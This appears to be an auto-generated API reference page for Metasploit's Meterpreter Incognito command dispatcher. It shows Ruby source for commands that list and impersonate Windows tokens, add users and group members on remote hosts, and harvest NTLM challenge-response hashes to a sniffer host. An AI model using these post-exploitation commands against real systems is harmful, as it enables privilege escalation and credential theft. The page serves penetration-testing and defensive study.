Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Incognito

Inherits:
Object
  • Object
show all
Includes:
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher
Defined in:
lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb

Overview

Privilege escalation extension user interface.

Constant Summary collapse

Klass = 
Console::CommandDispatcher::Incognito
@@add_user_opts = 
Rex::Parser::Arguments.new(
"-h" => [ true,  "Add user to remote host" ])
@@add_localgroup_user_opts = 
Rex::Parser::Arguments.new(
"-h" => [ true,  "Add user to local group on remote host" ])
@@add_group_user_opts = 
Rex::Parser::Arguments.new(
"-h" => [ true,  "Add user to global group on remote host" ])
@@list_tokens_opts = 
Rex::Parser::Arguments.new(
"-u" => [ false,  "List tokens by unique username" ],
"-g" => [ false, "List tokens by unique groupname" ])

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary collapse

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #log_error, #msf_loaded?, #session, set_hash, #unknown_command

Methods included from Msf::Ui::Console::CommandDispatcher::Session

#cmd_background, #cmd_background_help, #cmd_exit, #cmd_irb, #cmd_irb_help, #cmd_irb_tabs, #cmd_pry, #cmd_pry_help, #cmd_resource, #cmd_resource_help, #cmd_resource_tabs, #cmd_sessions, #cmd_sessions_help

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Constructor Details

#initialize(shell) ⇒ Incognito

Initializes an instance of the priv command interaction.



23
24
25
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 23

def initialize(shell)
  super
end

Instance Method Details

#cmd_add_group_user(*args) ⇒ Object 



177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 177

def cmd_add_group_user(*args)
  # Default to localhost
  host = "127.0.0.1"

  @@add_group_user_opts.parse(args) { |opt, idx, val|
    case opt
      when "-h"
        host = val
    end
  }

  if (args.length < 2)
    print_line("Usage: add_group_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_group_user_opts.usage)
    return
  end

  system_privilege_check

  groupname = args[0]
  username = args[1]

  client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
    print(string)
  }

  return true
end

#cmd_add_localgroup_user(*args) ⇒ Object 



147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 147

def cmd_add_localgroup_user(*args)
  # Default to localhost
  host = "127.0.0.1"

  @@add_localgroup_user_opts.parse(args) { |opt, idx, val|
    case opt
      when "-h"
        host = val
    end
  }

  if (args.length < 2)
    print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
    print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
    print_line(@@add_localgroup_user_opts.usage)
    return
  end

  system_privilege_check

  groupname = args[0]
  username = args[1]

  client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
    print(string)
  }

  return true
end

#cmd_add_user(*args) ⇒ Object 



117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 117

def cmd_add_user(*args)
  # Default to localhost
  host = "127.0.0.1"

  @@add_user_opts.parse(args) { |opt, idx, val|
    case opt
      when "-h"
        host = val
    end
  }

  if (args.length < 2)
    print_line("Usage: add_user <username> <password> [options]\n")
    print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
    print_line(@@add_user_opts.usage)
    return
  end

  system_privilege_check

  username = args[0]
  password = args[1]

  client.incognito.incognito_add_user(host, username, password).each_line { |string|
    print(string)
  }

  return true
end

#cmd_impersonate_token(*args) ⇒ Object 



99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 99

def cmd_impersonate_token(*args)
  if (args.length < 1)
    print_line("Usage: impersonate_token <token>\n")
    print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
    print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
    print_line("Hint: Enclose with quotation marks if name contains a space\n")
    return
  end

  system_privilege_check
  username = args[0]
  client.incognito.incognito_impersonate_token(username).each_line { |string|
    print(string)
  }

  return true
end

#cmd_list_tokens(*args) ⇒ Object 



55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 55

def cmd_list_tokens(*args)
  token_order = -1

  @@list_tokens_opts.parse(args) { |opt, idx, val|
    case opt
      when "-u"
        token_order = 0
      when "-g"
        token_order = 1
    end
  }

  if (token_order == -1)
    print_line("Usage: list_tokens <list_order_option>\n")
    print_line("Lists all accessible tokens and their privilege level")
    print_line(@@list_tokens_opts.usage)
    return
  end

  system_privilege_check

  tokens = client.incognito.incognito_list_tokens(token_order)

  print_line()
  print_line("Delegation Tokens Available")
  print_line("========================================")

  tokens['delegation'].each_line { |string|
    print(string)
  }

  print_line()
  print_line("Impersonation Tokens Available")
  print_line("========================================")

  tokens['impersonation'].each_line { |string|
    print(string)
  }

  print_line()

  return true
end

#cmd_snarf_hashes(*args) ⇒ Object 



207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 207

def cmd_snarf_hashes(*args)
  if (args.length < 1)
    print_line("Usage: snarf_hashes <sniffer_host>\n")
    print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
    return
  end

  system_privilege_check

  print_line("[*] Snarfing token hashes...")
  client.incognito.incognito_snarf_hashes(args[0])
  print_line("[*] Done. Check sniffer logs")

  return true
end

#commandsObject

List of supported commands.



30
31
32
33
34
35
36
37
38
39
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 30

def commands
  {
    'add_user'            => 'Attempt to add a user with all tokens',
    'add_localgroup_user' => 'Attempt to add a user to a local group with all tokens',
    'add_group_user'      => 'Attempt to add a user to a global group with all tokens',
    'list_tokens'         => 'List tokens available under current user context',
    'impersonate_token'   => 'Impersonate specified token',
    'snarf_hashes'        => 'Snarf challenge/response hashes for every token'
  }
end

#nameObject

Name for this dispatcher



233
234
235
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 233

def name
  "Incognito"
end

#system_privilege_checkObject 



223
224
225
226
227
228
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb', line 223

def system_privilege_check
  unless client.sys.config.is_system?
    print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
    print_line("             Call rev2self if primary process token is SYSTEM")
  end
end